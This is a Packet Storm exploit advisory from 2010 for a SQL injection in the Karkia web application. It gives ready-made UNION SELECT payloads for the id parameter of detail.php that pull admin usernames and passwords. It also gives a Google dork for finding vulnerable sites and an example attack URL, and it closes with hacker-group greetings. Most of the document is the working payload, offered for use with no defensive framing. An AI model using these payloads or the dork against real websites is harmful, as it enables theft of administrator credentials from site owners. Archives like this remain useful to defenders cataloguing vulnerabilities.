Karkia SQL Injection

2010-06-23T00:00:00
ID PACKETSTORM:90881
Type packetstorm
Reporter Net.Edit0r
Modified 2010-06-23T00:00:00

Description

                                        
                                            `  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#######################[In The Name Of God ]##########################  
#Exploit Title : Karkia SQL Injection Vulnerability  
#Author : Net.Edit0r  
#Contact : Net.Edit0r@Att.Net  
#Location : Iran  
#Category : webapps  
Google dork : Powered by: Karkia.net  
#Code : [exploit code]  
########################################################################  
#  
# [~]Vulnerable File  
#  
# ~~~ >  
id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin--  
#  
# ~~~ > id=-1+union+select+1,concat(user,0x3a,pass),3+from+admin--  
#  
# [~] Example  
#  
#  
http://127.0.0.1/detail.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin  
#  
########################################################################  
#Greetz : Netqurd [M1] ~ Hitler  
#Special Thanks : D3v1.BlackHat, M4hd1, Riden , B3hz4d  
#Thanks 2 : ~[ CriMe ]~ , _R3v4l_ , † CoNstaNtine † , __l2o5v4__ ,  
# : ~~XTerror~~ , _RAMESH_  
#Note : IRANIAN HackerZ  
########################################################################  
#AttackerZ.IR ( Crazy Boys )  
#Sun-army.Org (Iranian HacKerZ)  
#Dark-tunnel.com (UnderGround Team)  
#PHC.IR <http://phc.ir/> (Phc-Persian Hackerz Community)  
#DevilzTM.Com (Devilztm Security Team)  
###########################[Net.Edit0r]#################################  
  
  
  
`